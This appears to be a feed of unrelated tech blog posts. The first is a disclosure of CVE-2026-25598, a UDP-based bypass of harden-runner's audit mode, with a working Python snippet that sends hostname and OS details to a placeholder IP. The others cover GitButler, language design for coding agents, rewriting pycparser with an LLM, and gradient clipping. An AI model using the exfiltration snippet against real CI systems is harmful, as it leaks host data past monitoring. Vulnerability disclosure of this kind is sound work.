The three techniques demonstrated ( , , and ) exploit this blind spot not through sophisticated evasion, but by leveraging legitimate kernel interfaces that fall outside the monitoring scope.

GitHub Advisory: CVE-2026-25598

The vulnerability has been patched in harden-runner v2.14.2 for the Community Tier.

Sections: CVE-2026-25598 · Bypass using sendto · Bypass using sendmsg · Bypass using sendmmsg · Closing Thoughts

Affected versions:

- Harden-Runner Community Tier: All versions prior to v2.14.2
- Harden-Runner Enterprise Tier: NOT AFFECTED

Steps of the sendto payload:

- Creates a UDP socket.
- Prepares a destination address structure for the specified IP and port 1053.
- Collects system details using and .
- Formats a message (e.g., "R:hostname,O:Linux 5.15.0").
- Sends the message via without establishing a connection.

Steps of the sendmsg payload:

- Creates a UDP socket.
- Prepares a destination address structure for the specified IP and port 1053.
- Collects system details using and .
- Formats a message (e.g., "R:hostname,O:Linux 5.15.0").
- Sends the message via using an and structure without establishing a connection.

Steps of the sendmmsg payload:

- Creates a UDP socket.
- Prepares a destination address structure for the specified IP and port 1053.
- Collects system details using and .
- Formats a message (e.g., "R:hostname,O:Linux 5.15.0").
- Sends the message via using an structure (wrapping a single with ) without establishing a connection; designed for batch sending but used here for one message.
- Closes the socket.

Key Takeaways:

- Audit mode has inherent limitations : These bypasses only affect audit mode. The block mode properly prevents these connections, reinforcing that enforcement is more effective than observation alone.
- UDP monitoring is harder than TCP : The connectionless nature of UDP means there's no "connection establishment" phase to hook into, making detection more challenging.
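To make the mechanism concrete, here is a Python rendering of the sendto payload's steps (the original PoC generated C; this port to Python and the placeholder destination are mine). The point is that the datagram leaves the machine without any connect() phase for a connection-oriented monitor to hook:

```python
import os
import socket

def exfil_sysinfo(dest_ip: str, dest_port: int = 1053) -> bytes:
    """Build an 'R:<hostname>,O:<os> <release>' message and send it as a
    single connectionless UDP datagram via sendto()."""
    uname = os.uname()  # POSIX-only; mirrors the uname() call in the PoC
    message = f"R:{socket.gethostname()},O:{uname.sysname} {uname.release}".encode()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # No connect() call at all -- the send itself is the only syscall,
        # which is what made audit-mode UDP monitoring hard.
        sock.sendto(message, (dest_ip, dest_port))
    finally:
        sock.close()
    return message

# exfil_sysinfo("203.0.113.5")  # placeholder TEST-NET-3 address, not a real listener
```

The sendmsg and sendmmsg variants differ only in which syscall carries the same unconnected datagram.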

matduggan.com 2 weeks ago

GitButler CLI Is Really Good

My workflow has remained mostly the same for over a decade. I write everything in Vim using the configuration found here . I run Vim from inside of tmux with a configuration found here . I write things on a git branch, made with the CLI, then I add them with to that branch, trying to run all of the possible linting and tests with before I waste my time on GitHub Actions. Then I run which is an alias to . Finally I successfully commit, then I copy paste the URL returned by GitHub to open a PR. Then I merge the PR and run to go back to the primary branch, which is an alias to . This workflow, I think, is pretty familiar for anyone working with GitHub a lot. Now you'll notice I'm not saying because almost nothing I'm doing has anything to do with . There's no advantage to my repo being local to my machine, because everything I need to actually merge and deploy code lives on GitHub. The CI runs there, the approval process runs there, the monitoring of the CI happens there, the injection of secrets happens there. If GitHub is down my local repo does, effectively, nothing. My source of truth is always remote, which means I pay the price for complexity locally but I don't benefit from it. At most jobs: This means the following is also true: Almost all the features of are wasted on me in this flow. Now because this tool serves a million purposes and is designed to operate in a way that almost nobody uses it for, we all pay the complexity price of and never reap any of the benefits. So instead I keep having to add more aliases to paper over the shortcomings of . These are all the aliases I use at least once a week. Git's offline-first design creates friction for online-first workflows, and GitButler CLI eliminates that friction by being honest about how we actually work. (Edit: I forgot to add this disclaimer. I am not, nor have ever been an employee/investor/best friends with anyone from GitButler. 
They don't care that I've written this and I didn't communicate with anyone from that team before I wrote this.)

So let's take the most basic command as an example. This is my flow that I do 2-3 times a day without my aliases. I do this because can't make assumptions about the state of the world. However, because GitButler is designed with the assumption that I'm working online, we can skip a lot of this nonsense. Its status command understands that there is always a remote main that I care about, and that when I run a status I need to understand my status relative to the remote main as it exists right now. Not how it existed the last time I remembered to pull.

However, this is far from the best trick it has up its sleeve. You're working on a feature, notice an unrelated bug, and now you have to stash, checkout, fix, commit, push, checkout back, stash pop. Context switching is expensive and error-prone. GitButler effectively hacks a solution into that fixes this with multiple branches applied simultaneously. Assign files to different branches without leaving your workspace. What do I mean by that? Let's start again with my status. Great, looks good. Alright, so let's say I make 2 new branches. I'm working on a new feature for adding auth and while I'm working on that, I see a typo I need to fix in a YAML. I can work on both things at the same time: And easily commit to both at the same time without doing anything weird .

Stacked PRs are the "right" way to break up large changes so people on your team don't throw up at being asked to review 2000 lines, but Git makes them miserable. When the base branch gets feedback, you have to rebase every dependent branch, resolve conflicts, force-push, and pray. Git doesn't understand branch dependencies. It treats every branch as independent, so you have to manually maintain the stack. GitButler solves this problem with first-class stacked branches. The dependency is explicit, and updates propagate automatically.
So what do I mean? Let's say I make a new API endpoint in some Django app. First I make the branch. So let's say I'm working on the branch and get some good feedback on my PR. It's easy to resolve the comments there while leaving my branched off this as a stacked thing that understands the relationship back to the first branch, as shown here. In practice this is just a much nicer way of dealing with a super common workflow.

Maybe the most requested feature from new users I encounter is an easier undo. When you mess up in Git, recovery means diving into , understanding the cryptic output, and hoping you pick the right . One wrong move and you've made it worse. GitButler's is just easier to use. So the basic undo functionality is super simple to understand. rolls me back one operation. To me, the mental model of a snapshot makes a lot more sense than the git history model. I do an action, I want to undo that action. This is better than the git option of:

I've been using GitButler in my daily work since I got the email that the CLI was available and I've really loved it. I'm a huge fan of what this team is doing to effectively remodel and simplify Git operations in a world where almost nobody is using it in the way the tool was originally imagined to be used. I strongly encourage folks to go check it out for free at: https://docs.gitbutler.com/cli-guides/cli-tutorial/tutorial-overview . It does a ton of things (like help you manage PRs) that I didn't even touch on here.
Let me know if you find something cool that I forgot at: https://c.im/@matdevdug

- You can't merge without GitHub (PRs are the merge mechanism)
- You can't deploy without GitHub (Actions is the deployment trigger)
- You can't get approval without GitHub (code review lives there)
- Your commits are essentially "drafts" until they exist on GitHub

- You never work disconnected intentionally
- You don't use local branches as long-lived divergent histories
- You don't merge locally between branches (GitHub PRs handle this)
- You don't use for archaeology — you use GitHub's blame/history UI (I often use git log personally but I have determined I'm in the minority on this).

- Your local repo might be offline for days or weeks
- The "remote" might be someone else's laptop, not a central server
- Divergent histories are expected and merging is a deliberate, considered act

Armin Ronacher 2 weeks ago

A Language For Agents

Last year I first started thinking about what the future of programming languages might look like now that agentic engineering is a growing thing. Initially I felt that the enormous corpus of pre-existing code would cement existing languages in place but now I’m starting to think the opposite is true. Here I want to outline my thinking on why we are going to see more new programming languages and why there is quite a bit of space for interesting innovation. And just in case someone wants to start building one, here are some of my thoughts on what we should aim for! Does an agent perform dramatically better on a language that it has in its weights? Obviously yes. But there are less obvious factors that affect how good an agent is at programming in a language: how good the tooling around it is and how much churn there is. Zig seems underrepresented in the weights (at least in the models I’ve used) and also changing quickly. That combination is not optimal, but it’s still passable: you can program even in the upcoming Zig version if you point the agent at the right documentation. But it’s not great. On the other hand, some languages are well represented in the weights but agents still don’t succeed as much because of tooling choices. Swift is a good example: in my experience the tooling around building a Mac or iOS application can be so painful that agents struggle to navigate it. Also not great. So, just because it exists doesn’t mean the agent succeeds and just because it’s new also doesn’t mean that the agent is going to struggle. I’m convinced that you can build yourself up to a new language if you don’t want to depart everywhere all at once. The biggest reason new languages might work is that the cost of coding is going down dramatically. The result is the breadth of an ecosystem matters less. I’m now routinely reaching for JavaScript in places where I would have used Python. 
Not because I love it or the ecosystem is better, but because the agent does much better with TypeScript. The way to think about this: if important functionality is missing in my language of choice, I just point the agent at a library from a different language and have it build a port. As a concrete example, I recently built an Ethernet driver in JavaScript to implement the host controller for our sandbox. Implementations exist in Rust, C, and Go, but I wanted something pluggable and customizable in JavaScript. It was easier to have the agent reimplement it than to make the build system and distribution work against a native binding. New languages will work if their value proposition is strong enough and they evolve with knowledge of how LLMs train. People will adopt them despite being underrepresented in the weights. And if they are designed to work well with agents, then they might be designed around familiar syntax that is already known to work well.

So why would we want a new language at all? The reason this is interesting to think about is that many of today’s languages were designed with the assumption that punching keys is laborious, so we traded certain things for brevity. As an example, many languages — particularly modern ones — lean heavily on type inference so that you don’t have to write out types. The downside is that you now need an LSP or the resulting compiler error messages to figure out what the type of an expression is. Agents struggle with this too, and it’s also frustrating in pull request review where complex operations can make it very hard to figure out what the types actually are. Fully dynamic languages are even worse in that regard. The cost of writing code is going down, but because we are also producing more of it, understanding what the code does is becoming more important. We might actually want more code to be written if it means there is less ambiguity when we perform a review.
I also want to point out that we are heading towards a world where some code is never seen by a human and is only consumed by machines. Even in that case, we still want to give an indication to a user, who is potentially a non-programmer, about what is going on. We want to be able to explain to a user what the code will do without going into the details of how. So the case for a new language comes down to: given the fundamental changes in who is programming and what the cost of code is, we should at least consider one. It’s tricky to say what an agent wants because agents will lie to you and they are influenced by all the code they’ve seen. But one way to estimate how they are doing is to look at how many changes they have to perform on files and how many iterations they need for common tasks. There are some things I’ve found that I think will be true for a while. The language server protocol lets an IDE infer information about what’s under the cursor or what should be autocompleted based on semantic knowledge of the codebase. It’s a great system, but it comes at one specific cost that is tricky for agents: the LSP has to be running. There are situations when an agent just won’t run the LSP — not because of technical limitations, but because it’s also lazy and will skip that step if it doesn’t have to. If you give it an example from documentation, there is no easy way to run the LSP because it’s a snippet that might not even be complete. If you point it at a GitHub repository and it pulls down individual files, it will just look at the code. It won’t set up an LSP for type information. A language that doesn’t split into two separate experiences (with-LSP and without-LSP) will be beneficial to agents because it gives them one unified way of working across many more situations. It pains me as a Python developer to say this, but whitespace-based indentation is a problem. 
The underlying token efficiency of getting whitespace right is tricky, and a language with significant whitespace is harder for an LLM to work with. This is particularly noticeable if you try to make an LLM do surgical changes without an assisted tool. Quite often they will intentionally disregard whitespace, add markers to enable or disable code and then rely on a code formatter to clean up indentation later. On the other hand, braces that are not separated by whitespace can cause issues too. Depending on the tokenizer, runs of closing parentheses can end up split into tokens in surprising ways (a bit like the “strawberry” counting problem), and it’s easy for an LLM to get Lisp or Scheme wrong because it loses track of how many closing parentheses it has already emitted or is looking at. Fixable with future LLMs? Sure, but also something that was hard for humans to get right too without tooling. Readers of this blog might know that I’m a huge believer in async locals and flow execution context — basically the ability to carry data through every invocation that might only be needed many layers down the call chain. Working at an observability company has really driven home the importance of this for me. The challenge is that anything that flows implicitly might not be configured. Take for instance the current time. You might want to implicitly pass a timer to all functions. But what if a timer is not configured and all of a sudden a new dependency appears? Passing all of it explicitly is tedious for both humans and agents and bad shortcuts will be made. One thing I’ve experimented with is having effect markers on functions that are added through a code formatting step. A function can declare that it needs the current time or the database, but if it doesn’t mark this explicitly, it’s essentially a linting warning that auto-formatting fixes. 
The LLM can start using something like the current time in a function, and any existing caller gets the warning; formatting propagates the annotation. This is nice because when the LLM builds a test, it can precisely mock out these side effects — it understands from the error messages what it has to supply.

Agents struggle with exceptions; they are afraid of them. I'm not sure to what degree this is solvable with RL (Reinforcement Learning), but right now agents will try to catch everything they can, log it, and do a pretty poor recovery. Given how little information is actually available about error paths, that makes sense. Checked exceptions are one approach, but they propagate all the way up the call chain and don't dramatically improve things. Even if they end up as hints where a linter tracks which errors can fly by, there are still many call sites that need adjusting. And like the auto-propagation proposed for context data, it might not be the right solution. Maybe the right approach is to lean more on typed results, but that's still tricky for composability without a type and object system that supports it.

The general approach agents use today to read files into memory is line-based, which means they often pick chunks that span multi-line strings. One easy way to see this fall apart: have an agent work on a 2000-line file that also contains long embedded code strings — basically a code generator. The agent will sometimes edit within a multi-line string, assuming it's the real code when it's actually just embedded code. For multi-line strings, the only language I'm aware of with a good solution is Zig, but its prefix-based syntax is pretty foreign to most people.

Reformatting also often causes constructs to move to different lines. In many languages, trailing commas in lists are either not supported (JSON) or not customary.
If you want diff stability, you'd aim for a syntax that requires less reformatting and mostly avoids multi-line constructs.

What's really nice about Go is that you mostly cannot import symbols from another package into scope without every use being prefixed with the package name (say, strings.ToUpper(x) instead of a bare ToUpper(x)). There are escape hatches (import aliases and dot-imports), but they're relatively rare and usually frowned upon. That dramatically helps an agent understand what it's looking at. In general, making code findable through the most basic tools is great — it works with external files that aren't indexed, and it means fewer false positives for large-scale automation driven by code generated on the fly.

Much of what I've said boils down to: agents really like local reasoning. They want it to work in parts because they often work with just a few loaded files in context and don't have much spatial awareness of the codebase. They rely on external tooling like grep to find things, and anything that's hard to grep or that hides information elsewhere is tricky.

What makes agents fail or succeed in many languages is just how good the build tools are. Many languages make it very hard to determine what actually needs to rebuild or be retested because there are too many cross-references. Go is really good here: it forbids circular dependencies between packages (import cycles), packages have a clear layout, and test results are cached.

Agents often struggle with macros. It was already pretty clear that humans struggle with macros too, but the argument for them was mostly that code generation was a good way to have less code to write. Since that is less of a concern now, we should aim for languages with less dependence on macros. There's a separate question about generics and comptime. I think they fare somewhat better because they mostly generate the same structure with different placeholders, and it's much easier for an agent to understand that.
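The package-prefix point translates directly to Python, where both styles are possible. A toy contrast (the function names here are just for illustration):

```python
# Grep-friendly: every call site names the module, so a plain
# `grep -rn "collections.Counter"` finds all uses.
import collections

def word_counts(text):
    return collections.Counter(text.split())

# Harder to grep: the alias decouples the call site from the
# definition, so searching for "Counter" misses these uses entirely.
from collections import Counter as C

def word_counts_aliased(text):
    return C(text.split())

print(word_counts("a b a"))  # -> Counter({'a': 2, 'b': 1})
```

Both functions behave identically; only the first leaves a trail that basic text search can follow.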
Related to greppability: agents often struggle to understand barrel files, and they don't like them. Not being able to quickly figure out where a class or function comes from leads to imports from the wrong place, or missing things entirely and wasting context by reading too many files. A one-to-one mapping from where something is declared to where it's imported from is great. And it does not have to be overly strict either. Go kind of goes this way, but not to an extreme. Any file within a directory can define a function, which isn't optimal, but it's quick enough to find and you don't need to search too far. It works because packages are forced to be small enough to find everything with grep. The worst case is free re-exports all over the place that completely decouple the implementation from any trivially reconstructable location on disk. Or worse: aliasing. Agents often hate it when aliases are involved. In fact, you can even get them to complain about it in thinking blocks if you let them refactor something that uses lots of aliases. Ideally a language encourages good naming and discourages aliasing at import time as a result.

Nobody likes flaky tests, but agents even less so. Ironic, given how particularly good agents are at creating flaky tests in the first place. That's because agents currently love to mock, and most languages do not support mocking well. So many tests end up accidentally not being concurrency safe, or depend on development environment state that then diverges in CI or production. Most programming languages and frameworks make it much easier to write flaky tests than non-flaky ones. That's because they encourage indeterminism everywhere.

In an ideal world the agent has one command that lints and compiles and tells it whether everything worked out fine. Maybe another command to run all tests that need running. In practice most environments don't work like this. For instance, in TypeScript you can often run the code even though it fails type checks.
That can gaslight the agent. Likewise, different bundler setups can cause one thing to succeed just for a slightly different setup in CI to fail later. The more uniform the tooling, the better. Ideally it either runs or it doesn't, and there is mechanical fixing for as many linting failures as possible so that the agent does not have to do it by hand.

So, will we see new languages? I think we will. We are writing more software now than we ever have — more websites, more open source projects, more of everything. Even if the ratio of new languages stays the same, the absolute number will go up. But I also truly believe that many more people will be willing to rethink the foundations of software engineering and the languages we work with. That's because while for some years it has felt like you need to build a lot of infrastructure for a language to take off, now you can target a rather narrow use case: make sure the agent is happy, and extend from there to the human.

I just hope we see two things. First, some outsider art: people who haven't built languages before trying their hand at it and showing us new things. Second, a much more deliberate effort to document what works and what doesn't from first principles. We have actually learned a lot about what makes good languages and how to scale software engineering to large teams. Yet a consumable written overview of good and bad language design is very hard to come by. Too much of it has been shaped by opinion on rather pointless things instead of hard facts. Now, though, we are slowly getting to the point where facts matter more, because you can actually measure what works by seeing how well agents perform with it. No human wants to be subject to surveys, but agents don't care. We can see how successful they are and where they are struggling.


Rewriting pycparser with the help of an LLM

pycparser is my most widely used open source project (with ~20M daily downloads from PyPI [1] ). It's a pure-Python parser for the C programming language, producing ASTs inspired by Python's own ast module. Until very recently, it's been using PLY: Python Lex-Yacc for the core parsing. In this post, I'll describe how I collaborated with an LLM coding agent (Codex) to help me rewrite pycparser to use a hand-written recursive-descent parser and remove the dependency on PLY. This has been an interesting experience; the post contains lots of information and is therefore quite long. If you're just interested in the final result, check out the latest code of pycparser - the main branch already has the new implementation.

While pycparser has been working well overall, there were a number of nagging issues that persisted over the years. I began working on pycparser in 2008, and back then using a YACC-based approach for parsing a whole language like C seemed like a no-brainer to me. Isn't this what everyone does when writing a serious parser? Besides, the K&R2 book famously carries the entire grammar of the C99 language in an appendix - so it seemed like a simple matter of translating that to PLY-yacc syntax. And indeed, it wasn't too hard, though there definitely were some complications in building the ASTs for declarations (C's gnarliest part ).

Shortly after completing pycparser, I got more and more interested in compilation and started learning about the different kinds of parsers more seriously. Over time, I grew convinced that recursive descent is the way to go - producing parsers that are easier to understand and maintain (and are often faster!). It all ties in to the benefits of dependencies in software projects as a function of effort . Using parser generators is a heavy conceptual dependency: it's really nice when you have to churn out many parsers for small languages.
But when you have to maintain a single, very complex parser as part of a large project, the benefits quickly dissipate and you're left with a substantial dependency that you constantly grapple with.

And then there are the usual problems with dependencies: dependencies get abandoned, and they may also develop security issues. Sometimes, both of these become true. Many years ago, pycparser forked and started vendoring its own version of PLY. This was part of transitioning pycparser to a dual Python 2/3 code base when PLY was slower to adapt. I believe this was the right decision, since PLY "just worked" and I didn't have to deal with active (and very tedious in the Python ecosystem, where packaging tools are replaced faster than dirty socks) dependency management.

A couple of weeks ago this issue was opened for pycparser. It turns out that some old PLY code triggers security checks used by some Linux distributions; while this code was fixed in a later commit of PLY, PLY itself was apparently abandoned and archived in late 2025. And guess what? That happened in the middle of a large rewrite of the package, so re-vendoring the pre-archiving commit seemed like a risky proposition. On the issue it was suggested that "hopefully the dependent packages move on to a non-abandoned parser or implement their own"; I originally laughed this idea off, but then it got me thinking... which is what this post is all about.

The original K&R2 grammar for C99 had - famously - a single shift-reduce conflict, having to do with a dangling else belonging to the most recent if statement. And indeed, other than the famous lexer hack used to deal with C's type name / ID ambiguity , pycparser only had this single shift-reduce conflict. But things got more complicated. Over the years, features were added that weren't strictly in the standard but were supported by all the industrial compilers.
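Incidentally, the dangling else is a nice illustration of why recursive descent is comfortable to maintain: the ambiguity that needs a tie-break in a YACC grammar just falls out of the code structure. Here's a minimal toy sketch (an invented token-list grammar, emphatically not pycparser's actual code):

```python
# Toy recursive-descent parser for statements of the form
#   "if" COND stmt ["else" stmt] | WORD
# The greedy `else` check inside parse_statement makes the else
# bind to the *nearest* if, as in C -- no conflict resolution needed.
def parse(tokens):
    toks = list(tokens)
    pos = 0

    def peek():
        return toks[pos] if pos < len(toks) else None

    def parse_statement():
        nonlocal pos
        if peek() == "if":
            pos += 1                 # consume "if"
            cond = toks[pos]; pos += 1
            then = parse_statement()
            # The innermost active call sees the "else" first,
            # so it attaches to the most recent "if".
            if peek() == "else":
                pos += 1             # consume "else"
                return ("if", cond, then, parse_statement())
            return ("if", cond, then)
        stmt = peek(); pos += 1      # a bare statement token
        return stmt

    return parse_statement()

tree = parse(["if", "a", "if", "b", "s1", "else", "s2"])
print(tree)  # -> ('if', 'a', ('if', 'b', 's1', 's2'))
```

The else ends up inside the inner if-node simply because the inner recursive call is the one looking at the token stream when the else arrives.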
The more advanced C11 and C23 standards weren't beholden to the promises of conflict-free YACC parsing (since almost no industrial-strength compilers use YACC at this point), so all caution went out of the window. The latest (PLY-based) release of pycparser has many reduce-reduce conflicts [2] ; these are a severe maintenance hazard because it means the parsing rules essentially have to be tie-broken by order of appearance in the code. This is very brittle; pycparser has only managed to maintain its stability and quality through its comprehensive test suite. Over time, it became harder and harder to extend, because YACC parsing rules have all kinds of spooky-action-at-a-distance effects. The straw that broke the camel's back was this PR , which again proposed to increase the number of reduce-reduce conflicts [3] . This - again - prompted me to think "what if I just dump YACC and switch to a hand-written recursive descent parser", and here we are.

None of the challenges described above are new; I've been pondering them for many years now, and yet biting the bullet and rewriting the parser didn't feel like something I'd like to get into. By my private estimates it'd take at least a week of deep heads-down work to port the gritty 2000 lines of YACC grammar rules to a recursive descent parser [4] . Moreover, it wouldn't be a particularly fun project either - I didn't feel like I'd learn much new, and my interests have shifted away from this project. In short, the potential well was just too deep.

I've definitely noticed the improvement in capabilities of LLM coding agents in the past few months, and many reputable people online rave about using them for increasingly larger projects. That said, would an LLM agent really be able to accomplish such a complex project on its own? This isn't just a toy; it's thousands of lines of dense parsing code. What gave me hope is the concept of conformance suites mentioned by Simon Willison .
Agents seem to do well when there's a very clear and rigid goal function - such as a large, high-coverage conformance test suite. And pycparser has a very extensive one : over 2500 lines of test code parsing various C snippets to ASTs with expected results, grown over a decade and a half of real issues and bugs reported by users. I figured the LLM can either succeed or fail and throw its hands up in despair, but it's quite unlikely to produce a wrong port that would still pass all the tests.

So I set it to run. I fired up Codex in pycparser's repository, and wrote an initial prompt just to make sure it understood me and could run the tests. Codex figured it out (I gave it the exact command, after all!); my next prompt was the real thing [5] . Here Codex went to work and churned for over an hour . Having never observed an agent work for nearly this long, I kind of assumed it had gone off the rails and would fail sooner or later. So I was rather surprised and skeptical when it eventually came back claiming success.

It took me a while to poke around the code and run it until I was convinced - it had actually done it! It wrote a new recursive descent parser with only ancillary dependencies on PLY, and that parser passed the test suite. After a few more prompts, we'd removed the ancillary dependencies and made the structure clearer. I hadn't looked too deeply into code quality at this point, but at least on the functional level - it succeeded. This was very impressive!

A change like the one described above is impossible to code-review as one PR in any meaningful way, so I used a different strategy. Before embarking on this path, I created a new branch, and once Codex finished the initial rewrite, I committed this change, knowing that I would review it in detail, piece-by-piece, later on. Even though coding agents have their own notion of history and can "revert" certain changes, I felt much safer relying on Git.
In the worst case, if all of this went south, I could nuke the branch and it would be as if nothing ever happened. I was determined to only merge this branch onto main once I was fully satisfied with the code. In what follows, I had to git reset several times when I didn't like the direction in which Codex was going. In hindsight, doing this work in a branch was absolutely the right choice.

Once I'd sufficiently convinced myself that the new parser was actually working, I used Codex to similarly rewrite the lexer and get rid of the PLY dependency entirely, deleting it from the repository. Then, I started looking more deeply into code quality - reading the code created by Codex and trying to wrap my head around it. And - oh my - this was quite the journey.

Much has been written about the code produced by agents, and much of it seems to be true. Maybe it's a setting I'm missing (I'm not using my own custom AGENTS.md yet, for instance), but Codex seems to be that eager programmer that wants to get from A to B whatever the cost. Readability, minimalism and code clarity are very much secondary goals. Using raise...except for control flow? Yep. Abusing Python's weak typing (like having None , False and other values all mean different things for a given variable)? For sure. Spreading the logic of a complex function all over the place instead of putting all the key parts in a single switch statement? You bet.

Moreover, the agent is hilariously lazy . More than once I had to convince it to do something it initially said was impossible, and even insisted upon again in follow-up messages. The anthropomorphization here is mildly concerning, to be honest. I could never have imagined I would be writing something like the following to a computer, and yet - here we are: "Remember how we moved X to Y before? You can do it again for Z, definitely. Just try".

My process was to see how I could instruct Codex to fix things, and intervene myself (by rewriting code) as little as possible.
I've mostly succeeded in this, and did maybe 20% of the work myself. My branch grew dozens of commits, falling into roughly these categories:

1. The code in X is too complex; why can't we do Y instead?
2. The use of X is needlessly convoluted; change Y to Z, and T to V in all instances.
3. The code in X is unclear; please add a detailed comment - with examples - to explain what it does.

Interestingly, after doing (3), the agent was often more effective in giving the code a "fresh look" and succeeding in either (1) or (2). Eventually, after many hours spent in this process, I was reasonably pleased with the code. It's far from perfect, of course, but taking the essential complexities into account, it's something I could see myself maintaining (with or without the help of an agent). I'm sure I'll find more ways to improve it in the future, but I have a reasonable degree of confidence that this will be doable.

It passes all the tests, so I've been able to release a new version (3.00) without major issues so far. The only issue I've discovered is that some of CFFI's tests are overly precise about the phrasing of errors reported by pycparser; this was an easy fix . The new parser is also faster, by about 30% based on my benchmarks! This is typical of recursive descent when compared with YACC-generated parsers, in my experience. After reviewing the initial rewrite of the lexer, I spent a while instructing Codex on how to make it faster, and it worked reasonably well.

While working on this, it became quite obvious that static typing would make the process easier. LLM coding agents really benefit from closed loops with strict guardrails (e.g. a test suite to pass), and type annotations act as such. For example, had pycparser already been type annotated, Codex would probably not have overloaded values to multiple types (like None vs. False vs. others). In a followup, I asked Codex to type-annotate pycparser (running checks using ty ), and this was also a back-and-forth process, because it exposed some issues that needed to be refactored. Time will tell, but hopefully it will make further changes in the project simpler for the agent.

Based on this experience, I'd bet that coding agents will be somewhat more effective in strongly typed languages like Go, TypeScript and especially Rust. Overall, this project has been a really good experience, and I'm impressed with what modern LLM coding agents can do! While there's no reason to expect that progress in this domain will stop, even if it does - these are already very useful tools that can significantly improve programmer productivity. Could I have done this myself, without an agent's help? Sure. But it would have taken me much longer, assuming that I could even muster the will and concentration to engage in this project. I estimate it would have taken me at least a week of full-time work (so 30-40 hours), spread over who knows how long, to accomplish. With Codex, I put an order of magnitude less work into this (around 4-5 hours, I'd estimate) and I'm happy with the result.

It was also fun . At least in one sense, my professional life can be described as the pursuit of focus, deep work and flow . It's not easy for me to get into this state, but when I do, I'm highly productive and find it very enjoyable. Agents really help me here. When I know I need to write some code and it's hard to get started, asking an agent to write a prototype is a great catalyst for my motivation. Hence the meme at the beginning of the post.

One can't avoid a nagging question - does the quality of the code produced by agents even matter? Clearly, the agents themselves can understand it (if not today's agents, then at least next year's). Why worry about future maintainability if the agent can maintain it? In other words, does it make sense to just go full vibe-coding? This is a fair question, and one I don't have an answer to. Right now, for projects I maintain and stand behind , it seems obvious to me that the code should be fully understandable and accepted by me, and the agent is just a tool helping me get to that state more efficiently.

It's hard to say what the future holds here; it's going to be interesting, for sure.

There was also the lexer to consider, but this seemed like a much simpler job. My impression is that in the early days of computing, lex gained prominence because of strong regexp support, which wasn't very common yet. These days, with excellent regexp libraries existing for pretty much every language, the added value of lex over a custom regexp-based lexer isn't very high. That said, it wouldn't make much sense to embark on a journey to rewrite just the lexer; the dependency on PLY would still remain, and besides, PLY's lexer and parser are designed to work well together. So it wouldn't help me much without tackling the parser beast.

Giles's blog 3 weeks ago

Writing an LLM from scratch, part 32b -- Interventions: gradient clipping

I'm still working on training the best GPT-2 small sized base model that I can with a number of FLOPs roughly equal to two days on my own machine -- my "extra credit" exercise after having worked through Sebastian Raschka's book " Build a Large Language Model (from Scratch) ". In the last post I trained a baseline model -- one with the same architecture and almost the same training code as in the minimal training run in the book, just modified to run using DDP on an 8x A100 40 GiB/GPU machine in the cloud. There are a bunch of "interventions" I want to try to see if they'll make it better, as measured by the loss they get on a test set. I'll do a post for each intervention, and this is the first: gradient clipping.

In the training chart for the baseline model, you can see that there are three places where the loss suddenly spiked up, at around global steps 4,200, 13,000, and 23,000. There are a number of things that could cause loss spikes like that; exploding gradients are common in RNNs, and they also happen in LLMs like this one. I spent a bit of time reading around to find out how they happen, and the ah-ha moment came when I came across this post from Wanshun Wong . Not only is the post itself a good intro in terms of how the problem affects RNNs, but in the "further reading" at the end, there's some gold: Chapter 10.11 of [1] has a good overview of how gradient clipping works.

Now, I bought a copy of " Deep Learning " at the same time as I bought Raschka's book, but I'd only glanced through it. Now was the time to get it down from the shelf -- and, indeed, section 10.11.1 is all about clipping to handle exploding gradients. I'll put the explanation of how they happen into my own words, to see if I can clarify things (at least in my mind).

Normally, when we learn about gradient descent, it's illustrated with a nice smooth loss chart -- imagine one for a single-parameter model. We're told that we might start at point A.
The gradient is quite high and negative, so we multiply it by our learning rate and subtract it from our parameter. That gets us to point B. This time around, the gradient is smaller, as the curve is flatter there, so when we do the same -- multiply by LR and subtract -- we take a smaller step, and wind up at C. Rinse and repeat and we'll wind up near the minimum.

The problem is, what if the loss curve actually has a cliff in it? We start at A, with a small gradient, move a little to the right, and now we're at B, halfway down a cliff! The gradient is massive, and when we subtract it, even scaled by the learning rate, we can zoom off somewhere to the right -- maybe not even on the chart. Indeed, you can imagine a cliff that is so steep that it has vertical portions -- negative infinite gradients in this case -- and no matter what your learning rate is, you'll wind up with an infinite parameter update and everything will break. It's hard to see how a model can continue training in a case like that.

Now, what can cause steep cliffs like that? The book says "strongly nonlinear functions, such as those computed by a recurrent neural net over many time steps". If you know about RNNs (I wrote about them if you'd like a summary), you'll remember that a single RNN might be quite shallow -- maybe three or four layers -- but when you're doing backpropagation, you run a number of inputs through, one after the other, work out the overall loss, and then "unroll" it to something similar to a "vanilla" neural net to do the backward pass. To put that in concrete terms, a 3-layer neural network trained with a 100-element sequence would unroll to a 300-layer deep network. Every one of those layers has several operations, including (in the implementation I was looking at in my post above) a tanh. It's not surprising that there are cliffs in the loss landscape -- it's more surprising that there are any smooth bits!
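The cliff behaviour is easy to see numerically with a toy one-parameter example. The loss and its gradient here are entirely invented for illustration: a gentle downward slope that suddenly plunges at w = 1.0.

```python
# Toy illustration of a "cliff" in a one-parameter loss landscape.
# This piecewise gradient is made up purely for demonstration:
# -0.1 on the gentle plateau, -1000.0 on the cliff face past w = 1.0.
def toy_grad(w):
    return -0.1 if w < 1.0 else -1000.0

lr = 0.01

# On the plateau, the usual update rule takes a tiny, sensible step:
w = 0.5
w = w - lr * toy_grad(0.5)        # 0.501 -- a small step to the right

# Halfway down the cliff (point B above), the same rule overshoots:
w_cliff = 1.0005
w_cliff = w_cliff - lr * toy_grad(1.0005)
print(w_cliff)  # about 11 -- we've zoomed far off to the right
```

Same learning rate, same update rule; the only difference is the local gradient, and one step undoes thousands of plateau-sized steps of progress.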
Now in LLMs, we don't have that unrolling through time -- but our network is deep enough as it is. For the GPT-2 small model, disregarding the embeddings and the final output head, we have 12 Transformer layers, each of which is multiple matrix multiplications for attention, then a softmax, then another layer, and then a feed-forward... mapping precisely to the equivalent vanilla NN is hard, but I think you can treat each one as at least four layers, so we've got 48. And there are GELUs and logs and exps 1 dotted around, so again -- we should expect cliffs.

